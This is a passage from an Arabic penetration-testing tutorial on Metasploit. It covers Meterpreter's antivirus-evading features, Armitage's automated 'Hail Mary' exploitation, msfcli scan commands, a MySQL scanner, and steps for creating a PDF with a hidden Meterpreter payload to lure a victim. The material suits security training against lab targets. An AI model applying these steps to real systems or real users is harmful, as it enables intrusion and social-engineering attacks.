Meterpreterھو ﺣﻘﯾﻘﺔ أﻧﮫ ﯾﻌﻣل ﺑﺎﻟﻛﺎﻣل ﻓﻲ اﻟذاﻛرة وﻻ ﯾﺳﺗﺧدم اﻟﻘرص اﻟﺻﻠب أﺑدا .ﯾوﻓر ھذا اﻟﺗﻛﺗﯾك طﺑﻘﺔ ﻣن اﻟﺷﺑﺢ اﻟﺗﻲ ﺗﺳﺎﻋد ﻋﻠﻰ
اﻟﺗﮭرب ﻣن اﻟﻌدﯾد ﻣن أﻧظﻣﺔ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت وﯾﮭرب ﻣن ﺑﻌض أدوات اﻟطب اﻟﺷرﻋﻲ.
وظﺎﺋف Meterpreterﺑطرﯾﻘﺔ ﻣﺷﺎﺑﮭﺔ إﻟﻰ Windows cmd.exeأو .Linux /bin/shﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ،ﻓﺄﻧﮭﺎ ﺗﺗﯾﺢ
ﻟﻠﻣﮭﺎﺟم اﻟﺗﻔﺎﻋل ﻣﻊ وﺗﻧﻔﯾذ اﻷواﻣر ﻋﻠﻰ اﻟﮭدف ﻛﻣﺎ ﻟو ﻛﺎن اﻟﻣﮭﺎﺟم ﯾﺟﻠس ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ اﻟﺧﺎص ﺑﮫ .ﻣن اﻟﻣﮭم ﺟدا أن ﻧﻔﮭم أن ﺳﯾﺗم
ﺗﺷﻐﯾل Meterpreterﻣﻊ اﻻﻣﺗﯾﺎزات اﻟﻣﻘﺗرﻧﺔ ﺑﺎﻟﺑرﻧﺎﻣﺞ اﻟذي ﺗم اﺧﺗراﻗﮭﺎ.
Meterpreterﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﯾزات اﻟراﺋﻌﺔ اﻟﺗﻲ ﺑﻧﯾت ﻓﯾﮭﺎ اﻓﺗراﺿﯾﺎ .ﺗﺷﻣل اﻟوظﺎﺋف اﻷﺳﺎﺳﯾﺔ اﻷﻣر " ،“ migrateوھو أﻣر ﻣﻔﯾد
ﻟﺗﺣرﯾك اﻟﺧﺎدم ﻟﻌﻣﻠﯾﺔ أﺧرى .وھذا ﻣﮭم ﺟدت ،ﻓﻲ ﺣﺎل ﺗم إﯾﻘﺎف اﻟﺧدﻣﺔ اﻟﺗﻲ ﺗﻌﺗﺑر ﻧﻘطﺔ ﺿﻌف واﻟﺗﻲ ﺳف ﺗﮭﺎﺟﻣﮭﺎ .وظﯾﻔﺔ ﻣﻔﯾدة آﺧري ھو
اﻻﻣر " " catاﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻌرض ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟﻣﺣﻠﯾﺔ .وھذا ﻣﻔﯾد ﻻﺳﺗﻌراض اﻟﻣﻠﻔﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﮭدف .ﯾﺳﻣﺢ
اﻻﻣر " " downloadﻟﺳﺣب ﻣﻠف أو دﻟﯾل ﻣن اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ،ﻣﻣﺎ ﯾﺟﻌل ﻧﺳﺧﺔ ﻣﺣﻠﯾﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻣﮭﺎﺟم .ﯾﻣﻛن اﺳﺗﺧدام اﻷﻣر "
" uploadﻟﻧﻘل اﻟﻣﻠﻔﺎت ﻣن ﺟﮭﺎز اﻟﻣﮭﺎﺟم إﻟﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف .ﯾﻣﻛن اﺳﺗﺧدام اﻷﻣر " " editﻹﺟراء ﺗﻐﯾﯾرات ﻋﻠﻰ ﻣﻠﻔﺎت ﺑﺳﯾطﺔ .ﯾﻣﻛن
اﺳﺗﺧدام اﻻﻣر " " executeﻹﺻدار أﻣر ،وأﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﺑﻌﯾد ،ﻓﻲ ﺣﯾن أن اﻻﻣر " "killﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟوﻗف اﻟﻌﻣﻠﯾﺔ.
اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ھﻲ أﯾﺿﺎ ﻣﻔﯾدة وﺗوﻓر ﻧﻔس اﻟوظﯾﻔﺔ ﺑﺎﻟﺿﺑط ﻛﻣﺎ ﯾﻔﻌﻠون ﻋﻠﻰ ﺟﮭﺎز ﻟﯾﻧﻛس اﻟﻌﺎديshutdown " ،“ ps " ،“ ls" ،“ cd " :
“ ،“ pwd " ،“ mkdir " ،و " .“ ifconfig
ﻛﻣﺎ ﺗرون ،اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ Meterpreterھﻲ واﺣدة ﻣن أﻛﺛر وﺳﺎﺋل ﻗوﯾﺔ وﻣرﻧﺔ ،واﻟﺗﺧﻔﻲ ﯾﻣﻛن ﻷﺣد اﻟﻣﮭﺎﺟﻣﯾن اﻟﺗﻔﺎﻋل ﻣﻊ اﻟﮭدف.
أﻧﮭﺎ ﺗﺳﺗﺣﻖ وﻗﺗك ﻟﻣﻌرﻓﺔ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ھذه اﻷداة ﻓﻲ ﻣﺗﻧﺎول ﯾدي .ﺳﻧﻌود إﻟﻰ Meterpreterﻋﻧدﻣﺎ ﻧﻧﺎﻗش post exploitationﻓﻲ
اﻟﺧطوة .4
إﺻدارات أﺣدث ﻣن Metasploitذات وﺟﮫ رﺳوﻣﯾﮫ ﺗدﻋﻰ ارﻣﯾﺗﺎج ) .(Armitageﻓﮭم أرﻣﯾﺗﺎج ﻣﮭم ﻷﻧﮫ ﯾﺟﻌل ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف
اﺳﺗﺧداﻣك ﻟل Metasploitأﺳﮭل ﻋن طرﯾﻖ ﺗوﻓﯾر اﻟﻣﻌﻠوﻣﺎت ﻟك ﺑﺻرﯾﺎ .أﻧﮫ ﯾﺷﻣل وﺣدة اﻟﺗﺣﻛم ،Metasploitوﺑﺎﺳﺗﺧدام ﻗدرات
اﻟﺟدوﻟﺔ ﻟﮭﺎ ،وﯾﺳﻣﺢ ﻟك أن ﺗرى أﻛﺛر ﻣن وﺣدة اﻟﺗﺣﻛم Metasploitأو ﺟﻠﺳﺔ Meterpreterﻓﻲ وﻗت واﺣد.
ﯾﻣﻛﻧك ﻗراءة اﻟﻣزﯾد ﻋن ھذه اﻷداة ﺑزﯾﺎرة اﻟﻣوﻗﻊ http://www.fastandeasyhacking.com
Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage
-2ﻗد ﯾﺳﺗﻐرق ارﻣﯾﺗﺎج ﺑﻌض اﻟوﻗت ﻟﻼﺗﺻﺎل ﺑﺎﻠ .Metasploitﻓﻲ ﺣﯾن أن ھذا ﯾﺣدث ،ﻗد ﺗرى ﻧﺎﻓذة اﻹﻋﻼم اﻟﺗﺎﻟﻲ .ﻻ ﺗﻧدھش.
وﺳوف ﺗزول ﺑﻣﺟرد ان ﯾﻛون أرﻣﯾﺗﺎج ﻗﺎدرا ﻋﻠﻰ اﻻﺗﺻﺎل .ﻓﻲ اﻟﺷﺎه ذات اﻟﻌﻧوان ? ،Start Metasploitاﻧﻘر ﻋﻠﻰ :yes
-3ﺛم ﯾﺗم ﺗﻘدﯾﻣك اﻟﻰ اﻟﺷﺎﺷﺔ ارﻣﯾﺗﺎج اﻟرﺋﯾﺳﯾﺔ .وﻧﺣن اﻵن ﻓﻲ ﻣﻧﺎﻗﺷﺔ اﻟﻣﻧﺎطﻖ اﻟﺛﻼث اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ )وﺿﻊ ﻋﻼﻣﺔ ،A.
G ،.Bﻓﻲ اﻟﺻورة اﻟﺗﺎﻟﯾﺔ(:
:Aﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ اﻟوﺣدات اﻟﻣﻌدة ﺳﺎﺑﻘﺎ .ﯾﻣﻛﻧك اﻟﺑﺣث ﻋن اﻟوﺣدات ﺑﺎﺳﺗﺧدام SPACEاﻟﻣﺗوﻓرة أدﻧﺎ ﻗﺎﺋﻣﺔ اﻟوﺣدات اﻟﻧﻣطﯾﺔ.
:Bﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ أھداﻓك اﻟﻧﺷطﺔ اﻟﺗﻲ ﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺷﻐﯾل exploitاﻟﺗﻲ ﻟدﯾﻧﺎ ﺿد اﻟﮭدف.
:Cﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ اﻟﻌدﯾد ﻣن Metasploitﻟﻠﺳﻣﺎح ﻟﻠﻌدﯾد ﻣن Meterpreterأو ﺟﻠﺳﺎت CONSOLEﻟﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ وﻋرﺿﮭﺎ
ﻓﻲ وﻗت واﺣد.
ﻟﻣﺎذا ﻧﺗﻌرف ﻋﻠﻰ ﺧﻣس أدوات وﻋﻧدﻧﺎ اداه واﺣده ﻓﻘط ﺗﻌﻣل ﻛل ھذا؟
ﻗﺑل أن ﻧﺗﻣﻛن ﻣن اﻟﺑدء ﻓﻲ اﺳﺗﺧدام exploitﻋﻠﻰ ھدﻓﻧﺎ ،ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﻟﻘﯾﺎم ﻗﻠﯾﻼ ﺑﺑﻌض اﻻﻋﻣﺎل .أوﻻ ،ﻧﺳﺗﺧدم ارﻣﯾﺗﺎج ﻟﻔﺣص اﻟﺷﺑﻛﺔ
اﻟﻣﺣﻠﯾﺔ اﻟﺧﺎﺻﺔ ﺑﻧﺎ وﺗﺣدﯾد أي ﻣن اﻷھداف اﻟﺣﯾﺔ .ﻟﺗﺷﻐﯾل اﻟﻔﺣص ،اﻧﻘر ﻋﻠﻰ " "hostsاﻟﺧﯾﺎر اﻟﻣوﺟود ﻓﻲ اﻟﻘﺎﺋﻣﺔ وﻣن ﺛم اﺧﺗﯾﺎر "
) " Quick Scan (OS detectﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺻورة اﻟﺗﺎﻟﯾﺔ.
ﺑﻌد اﺧﺗﯾﺎر ") " Quick Scan (OS detectﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗوﻓﯾر ﻋﻧوان IPﺻﺎﻟﺢ أو ﻧطﺎق IPﻟﻌﻣﻠﯾﺔ اﻟﻔﺣص .ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن
اﻟﻔﺣص ،ﻓﺈن أي ﻣن اﻷھداف اﻟﻣﺣددة ﺳوف ﺗظﮭر ﻋﻠﻰ اﻟﺷﺎﺷﺔ ﻓﻲ ﻣﺳﺎﺣﺔ اﻟﻌﻣل .ﯾﻘدم اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻟﮭذا اﻟﻧﺎﺗﺞ .وﺳوف ﯾظﮭر ﻟك
رﺳﺎﻟﺔ ﺗﻌطﯾك ﺗﻌﻠﯾﻣﺎت ﺣول إﯾﺟﺎد ."Use Attacks → Find Attacks " exploit
طﺎﻟﻣﺎ ﺣدد ارﻣﯾﺗﺎج ھدﻓﺎ ﻣﺣﺗﻣﻼ واﺣد ﻋﻠﻰ اﻷﻗل ،ﻓﺈﻧك ﻋﻠﻰ اﺳﺗﻌداد ﻹطﻼق اﻟﻌﻧﺎن ﻟﺳﯾل ﻣن .exploitﻹﻧﺟﺎز ھذا ،ﺑﺑﺳﺎطﺔ اﻧﻘر ﻋﻠﻰ زر
" "Attacksﻣن اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗﻠﯾﮭﺎ " " Hail Maryﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ:
ﺑﺎﻟﻧﻘر ﻋﻠﻰ اﻟﺧﯾﺎر اﻟﺳﻼم Hail Maryﻓﺎﻧﮫ ﯾﺟﻌل أرﻣﯾﺗﺎج إﻟﻰ ارﺳﺎل طوﻓﺎن ﻣن exploitﺿد اﻟﮭدف .ﺳﺗﺑدأ أداة اﻟﺗﺷﻐﯾل وإﺻدار
اﻷواﻣر ﺗﻠﻘﺎﺋﯾﺎ .ﻗد ﺗﺳﺗﻐرق ھذه اﻟﻌﻣﻠﯾﺔ ﻋدة دﻗﺎﺋﻖ ﻟﻺﺗﻣﺎم .ﯾﻣﻛﻧك ﻣﺷﺎھدة ﺗﻘدم ﻟﻠﺑرﻧﺎﻣﺞ ﻓﻲ اﻟﻧﺻف اﻟﺳﻔﻠﻲ ﻣن اﻟﻧﺎﻓذة .ان ارﻣﯾﺗﺎج ﺳوف ﯾﻘدم
ﻟك اﯾﺿﺎ ﺷرﯾط اﻟﺗﻘدم ) (progress barﻟﺗﻣﻛﻧك ﻣن ﻣﻌرﻓﺔ ﻣدى طول اﻟﻌﻣﻠﯾﺔ وﺗﻘدﻣﮭﺎ .ﻟﻧﻛون واﺿﺣﯾن ،ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﻓﺎن ارﻣﯾﺗﺎج ﯾﻘوم
ﺑرﺑط ﻧﺗﺎﺋﺞ Nmapﻣﻊ exploitﻓﻲ Metasploitوﯾرﺳل ﻛل exploitذات اﻟﺻﻠﺔ ﺑﺎﻟﮭدف اﻧﺗﺑﮫ ﺟﯾدا ﻟواﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ اﻟﺗﻲ
ﺗﻣﺛل اﻟﮭدف اﻟﺧﺎص ﺑك ﻓﻲ ﺷﺎﺷﺔ أرﻣﯾﺗﺎج؛ إذا ﻛﺎن اﻟﮭدف أﺻﺑﺢ ﻣﺣدد ﺑﺿوء اﺣﻣر ﻋﻠﻰ ﺷﻛل ﺑرق ،ﻓﮭذا ﯾﻌﻧﻰ ان أرﻣﯾﺗﺎج ﻧﺟﺢ ﻓﻲ اﺧﺗراق
اﻟﮭدف .وﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻋﻠﻰ اﺧﺗراق اﻟﮭدف ﺑﺛﻼث ﺷل ﻋن ﺑﻌد.
ﻋﻧدﻣﺎ اﺳﺗﻧﻔﺎذ أرﻣﯾﺗﺎج اﻣداداﺗﮭﺎ ﻣن exploitاﻟﻣﺣﺗﻣﻠﺔ ،ﻓﺎﻧﮫ ﯾﻣﻛﻧك ﻋرض أي او ﺟﻣﯾﻊ اﻟﺷل اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻋن طرﯾﻖ اﻟﻧﻘر ﺑﺎﻟزر
اﻷﯾﻣن ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ:
ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﻣﻛﻧك اﻟﺗﻔﺎﻋل ﻣﻊ ھذا اﻟﮭدف ،وﺗﺣﻣﯾل اﻟﺑراﻣﺞ واﻟﻣواد إﻟﻰ اﻟﮭدف ،أو أداء ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن ﻏﯾرھﺎ ﻣن اﻟﮭﺟﻣﺎت.
ﻟﻠﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ﺷل وﺗﺷﻐﯾل اﻷواﻣر ﻋﻠﻰ اﻟﮭدف اﻟﺑﻌﯾد ،اﻧﻘر ﻓوق اﻟﺧﯾﺎر " ." interactھذا ﺳﯾﺳﻣﺢ ﻟك ﻹﺻدار وﺗﺷﻐﯾل اﻷواﻣر ﻓﻲ
إطﺎر اﻟﺗرﻣﻧﺎل اﻟﺧﺎص ارﻣﯾﺗﺎج .ﺟﻣﯾﻊ أواﻣر اﻟﺗﺷﻐﯾل ﺷوف ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﺑﻌﯾد ﻛﻣﺎ ﻟو ﻛﺎن ﻟدﯾك اﻟوﺻول اﻟﻣﺎدي وﺗﺗم اﻟﻛﺗﺎﺑﺔ ﻓﻲ
اﻟﺗرﻣﻧﺎل ﻋﻠﻰ اﻟﮭدف.
ﻓﻲ ھذه اﻟﺟزء ،ﺳوف ﻧﺳﺗﻛﺷف) Metasploit . Metasploit CLI (MSFCLIﯾﺗطﻠب اﺳﺗﺧدام واﺟﮭﺔ ﻣن أﺟل أداء ﻣﮭﺎﻣﮫ.
و MSFCLIھو ﻣﺛﺎل ﻟﮭذه اﻟواﺟﮭﺔ .ﺑل ھو واﺟﮭﺔ ﺟﯾدة ﻟﺗﻌﻠم Metasploitأو اﺧﺗﺑﺎر/ﻛﺗﺎﺑﺔ exploitﺟدﯾد .ﺑل ﯾﻌﻣل أﯾﺿﺎ ﺑﺷﻛل ﺟﯾد ﻓﻲ
ﺣﺎﻟﺔ اﺳﺗﺧدام اﻟﺳﻛرﯾﺑت وﺗطﺑﯾﻖ اﻟﻣﮭﺎم اﻷﺳﺎﺳﯾﺔ ﺑطرﯾﻘﮫ اﻟﯾﮫ.
اﻟﮭدف اﻟرﺋﯾﺳﻲ ﻣﻊ اﺳﺗﺧدام MSFCLIھو أﻧﮫ ﯾﻣﻛﻧك ﻓﻘط ﻓﺗﺢ ﺷل ﻓﻲ ﻛل ﻣرة .ﺳﺗﻼﺣظ أﯾﺿﺎ اﺳﺗﻛﺷﺎف ﺑﻌض اﻷواﻣر ﻟدﯾﻧﺎ أﻧﮫ ﯾﻌﻣل أﺑطﺄ
ﻗﻠﯾﻼ وھﻲ أﻛﺛر ﺗﻌﻘﯾدا ﺑﻘﻠﯾل ﻣن .MSFCONSOLEأﺧﯾرا ،ﻋﻠﯾك أن ﺗﻌرف ﺑﺎﻟﺿﺑط exploitاﻟذي ﺗرﻏب ﻓﻲ ﺗﺷﻐﯾل ﻣن أﺟل اﺳﺗﺧدام
.MSFCLIوھذا ﯾﻣﻛن أن ﯾﺟﻌل ﻣن اﻟﺻﻌب ﻗﻠﯾﻼ ﻻﺧﺗﺑﺎر اﻻﺧﺗراق اﻟﺟدد اﻟذﯾن ﻟﯾﺳوا ﻋﻠﻰ دراﯾﺔ ﻣﻊ ﻗﺎﺋﻣﺔ Metasploitﻣن .exploit
ﺑﻌض اﻷواﻣر ل MSFCLIھﻲ:
:msfcli -1ھذا اﻻﻣر ﯾﻘوم ﺑﺗﺣﻣﯾل ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ exploitاﻟﻣﺗوﻓرة ﻓﻲ ﻣﺗﻧﺎول .MSFCLI
:msfcli -h -2ﯾﻌرض ﻣﻠف ﻣﺳﺎﻋدة .MSFCLI
:msfcli [PATH TO EXPLOIT] [options = value] -3ھذه اﻟﺻﯾﻐﺔ ﻣن أﺟل ﺷن .exploit
ﺑدء ﺗﺷﻐﯾل ) Metasploit CLI (MSFCLIﺑﺎﺳﺗﺧدام اﻷﻣر اﻟﺗﺎﻟﻲ .ﯾرﺟﻰ اﻟﺗﺣﻠﻲ ﺑﺎﻟﺻﺑر ﻷن ھذا ﻗد ﯾﺳﺗﻐرق ﻗﻠﯾﻼ ﻣن اﻟوﻗت -
اﻋﺗﻣﺎدا ﻋﻠﻰ ﺳرﻋﺔ اﻟﻧظﺎم اﻟﺧﺎص ﺑك .ﻻﺣظ أﯾﺿﺎ أﻧﮫ ﻋﻧد ﺗﺣﻣﯾل ،MSFCLIﻓﺎن ﻗﺎﺋﻣﺔ ﻣن exploitاﻟﻣﺗﺎﺣﺔ ﺳوف ﯾﺗم
ﻋرﺿﮭﺎ.
ﻣن أﺟل اﻟﻌرض اﻟﺗوﺿﯾﺣﻲ ،ﻓﺈﻧﻧﺎ ﺳوف ﻧﻘوم ﺑﺈﺟراء ﻓﺣص .Christmas Tree Scanوﺳوف ﻧﺧﺗﺎر اﻟﺧﯾﺎر Aﻟﻌرض -
وﺣدات اﻟﺧﯾﺎرات اﻟﻣﺗﻘدﻣﺔ:
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ﯾﻣﻛﻧك ﺳرد ﻣوﺟز ﻟﻠوﺣدات اﻟﻧﻣطﯾﺔ اﻟﺣﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام اﻟوﺿﻊ .Sوﺿﻊ ﻣﻠﺧص ھو وﺳﯾﻠﺔ راﺋﻌﺔ ﻟﻣﻌرﻓﺔ ﻛﺎﻓﺔ -
اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟك ﻓﻲ exploitاﻟذي ﺗﺣﺎول ﺗﺷﻐﯾﻠﮫ .اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﺧﺗﯾﺎرﯾﺔ وﻟﻛن ،ﻋﺎدة ،ﯾطﻠب ﻣن ﻋدد ﻗﻠﯾل واﻟذي
ﯾﺳﻣﺢ ﻟك ﻟﺗﺣدﯾد اﻟﮭدف أو اﻟﻣﻧﻔذ اﻟذي ﺗﺣﺎول إطﻼق exploitﺿد.
ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟﮭذا ،exploitﻓﻧﺣن ﻧﺳﺗﺧدم اﻟوﺿﻊ .Oاﻟﺧﯾﺎرات ھﻲ وﺳﯾﻠﺔ ﻟﺗﻛوﯾن وﺣدة .exploitﻛل -
exploitوﺣدة ﻟدﯾﮭﺎ ﻣﺟﻣوﻋﺔ ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺧﯾﺎرات )أو ﻻ ﺷﻲء ﻋﻠﻰ اﻹطﻼق( .ﯾﺟب أن ﯾﺗم ﺗﻌﯾﯾن ﺟﻣﯾﻊ اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ ﻗﺑل
أن ﯾﺗم اﻟﺳﻣﺎح ﻟﺗﻧﻔﯾذ .exploitﻣن اﻟﺻورة اﻟﺗﺎﻟﯾﺔ ،ﺳﺗﻼﺣظ أن اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ ﯾﺗم ﺗﻌﯾﯾﻧﮭﺎ ﺑﺷﻛل اﻓﺗراﺿﻲ .إذا ﻛﺎن
ھذا ھو اﻟﺣﺎل ،ﻟم ﯾﻛن ﻟدﯾك ﻟﺗﺣدﯾث ﻗﯾﻣﺔ اﻟﺧﯾﺎرات إﻻ إذا ﻛﻧت ﺗرﯾد ﺗﻐﯾﯾره.
#msfcli auxiliary/scanner/portscan/xmas O
ﻟﺗﻧﻔﯾذ exploitﻟدﯾﻧﺎ ،ﻓﻧﺣن ﻧﺳﺗﺧدم اﻟوﺿﻊ :E -
#msfcli auxiliary/scanner/portscan/xmas E
METASPLOITABLE MYSQL
ﻓﻲ ھذه اﻟﺟزء ،ﺳوف ﻧﺳﺗﻛﺷف ﻛﯾﻔﯾﺔ اﺳﺗﺧدام Metasploitﻟﻣﮭﺎﺟﻣﺔ ﺧﺎدم ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت MYSQLﺑﺎﺳﺗﺧدام وﺣدة ﻓﺣص .MYSQL
ﻛوﻧﮭﺎ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﻔﺿﻠﺔ ﻟﻠﻛﺛﯾر ﻣن اﻟﻣﻧﺎﺑر ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ،ﺑﻣﺎ ﻓﻲ ذﻟك Drupalو ،WordPressواﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ ﺗﺳﺗﺧدم
ﺣﺎﻟﯾﺎ ﺧﺎدم ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت .MYSQLھذا ﯾﺟﻌﻠﮭﺎ ھدﻓﺎ ﺳﮭﻼ ﻟﮭﺟوم .Metasploitable MYSQL
-1ﻛﻣﺎ ﺗﻌﻠﻣﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ اﺳﺎﺳﯾﺎت ﺗﺷﻐﯾل metasploitﻧﻘوم ﺑﺗﺷﻐﯾل ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر msfconsoleﻓﻲ اﻟﺗرﻣﻧﺎل واﻟﺗﻲ ﺗؤدى
اﻟﻰ ﺗوﺟﯾﮭك اﻟﻰ اﻟﺗطﺑﯾﻖ .metasploit
-2ﻧﻘوم ﺑﺎﻟﺑﺣث ﻋن ﺟﻣﯾﻊ اﻟوﺣدات اﻟﻣرﺗﺑطﺔ ب MYSQLوذﻟك ﺑﺎﺳﺗﺧدام اﻻﻣر .search mysql
-3ﻧﻘوم ﺑﺎﺳﺗﺧدام وﺣدة ﻓﺣص MYSQLﻛﺎﻻﺗﻰ:
-4ﻧﻘوم ﺑﻌرض اﻟﻣﺗطﻠﺑﺎت اﻟﻣﺗﺎﺣﺔ ﻟﻛﻲ ﺗﻌﻣل ﺑﺎﺳﺗﺧدام اﻻﻣر .show options
-5ﻧﻘوم ﺑﺈﻋداد ھذه اﻟﻣﺗطﻠﺑﺎت ﺛم ﺷن اﻟﮭﺟوم ﺑﺎﺳﺗﺧدام اﻻﻣر .exploit
METASPLOITABLE PDF
ﻓﻲ ھذه اﻟﺟزء ،ﺳوف ﻧﺳﺗﻛﺷف ﻛﯾﻔﯾﺔ اﺳﺗﺧدام Metasploitﻟﺗﻧﻔﯾذ ھﺟوم ﺑﺎﺳﺗﺧدام ﺗﻧﺳﯾﻖ اﻟﻣﺳﺗﻧدات اﻟﻣﺣﻣوﻟﺔ ) .(PDFﻣﻠف Adobe
PDFھو ﻣﻌﯾﺎر ﯾﺳﺗﺧدم ﻟﻠﻐﺎﯾﺔ ﻟﻧﻘل ﻣﺳﺗﻧد إﻟﻰ طرف آﺧر .ﻧظرا ﻻﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧطﺎق واﺳﻊ ،وﺧﺻوﺻﺎ ﺑﺳﺑب اﺳﺗﺧدام أﻋﻣﺎﻟﮭﺎ ،ﺳﻧﮭﺎﺟم
ﺟﮭﺎز اﻟﻣﺳﺗﺧدم ﻣن ﺧﻼل اﻟﺳﻣﺎح ﻟﮭم ﺑﺎن ﯾﻌﺗﻘدوا أﻧﮭم ﯾﻘوﻣون ﺑﻔﺗﺢ ﻣﺳﺗﻧد .PDF
-1ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل
-2ﻧﻘوم ﺑﺗﺷﻐﯾل metasploitﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر msfconsoleﻓﻲ اﻟﺗرﻣﻧﺎل.
-3ﻧﻘو ﺑﺎﻟﺑﺣث ﻋن ﺛﻐرات pdfﻋن طرﯾﻖ اﺻدار اﻻﻣر .search pdf
-4اﺳﺗﺧدام أدوﺑﻲ PDFﺟزءا ﻻ ﯾﺗﺟزأ ﻣن :EXE Social engineering
use exploit/windows/fileformat/adobe_pdf_embedded_exe
-5ﺛم ﻧﻘوم ﺑﺎﺳﺗﺧدام اﻻﻣر show optionsﻟﻌرض اﻟﻣﺗطﻠﺑﺎت ﻟﺗﺷﻐﯾل exploitھذا.
-6ﻧﻼﺣظ ﻣن اﻟﻣﺗطﻠﺑﺎت اﻧﮫ ﯾﺣﺗﺎج وﺿﻊ ﻛل ﻣن FILENAMEو.INFILENAME
-7ﺣﯾث ﯾﻌﺑر FILENAMEﻋن ﻣﻠف PDFاﻟذي ﺗرﯾد اﻧﺷﺎﺋﮫ.
-8وﯾﻌﺑر INFILENAMEﻋن ﻣوﻗﻊ ﻣﻠف ) PDFاﻟﻐﯾر ﻣﺻﺎب( اﻟﺗﻲ ﻟدﯾك وﺻول اﻟﯾﮫ ﻟﻼﺳﺗﺧدام.
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
-9ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل EXPLIOTﻋن طرﯾﻖ اﺻدار اﻻﻣر .exploit
ﻓﻲ ھذه اﻟﺟزء ،اﺳﺗﺧدﻣﻧﺎ MSFCONSOLEﻹرﺳﺎل exploitوإﻧﺷﺎء ﻣﻠف PDFأدوﺑﻲ ﺗﺣﺗوي ﻋﻠﻰ Meterpreterﻣﺳﺗﺗر .ﺑدأﻧﺎ
ﻣن ﺧﻼل إطﻼق وﺣدة اﻟﺗﺣﻛم واﻟﺑﺣث ﻋن ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ PDFاﻟﻣﻌروﻓﺔ .ﺑﻌد اﺧﺗﯾﺎر EXE PDFﺟزءا ﻻ ﯾﺗﺟزأ ﻣن ،exploitواﻟذي
ﯾﺳﻣﺢ ﻟﻧﺎ ﻹﺧﻔﺎء ﺑرﻧﺎﻣﺞ ﻣﺳﺗﺗر ﻓﻲ ﻣﺷروع ،PDFوﺿﻌﻧﺎ ﺧﯾﺎراﺗﻧﺎ ﺛم ﻗﻣﻧﺎ ﺑﺗﻧﻔﯾذ Metasploit .exploitﺳوف ﯾﻧﺷﺎ PDFﯾراﻓﻘﮫ
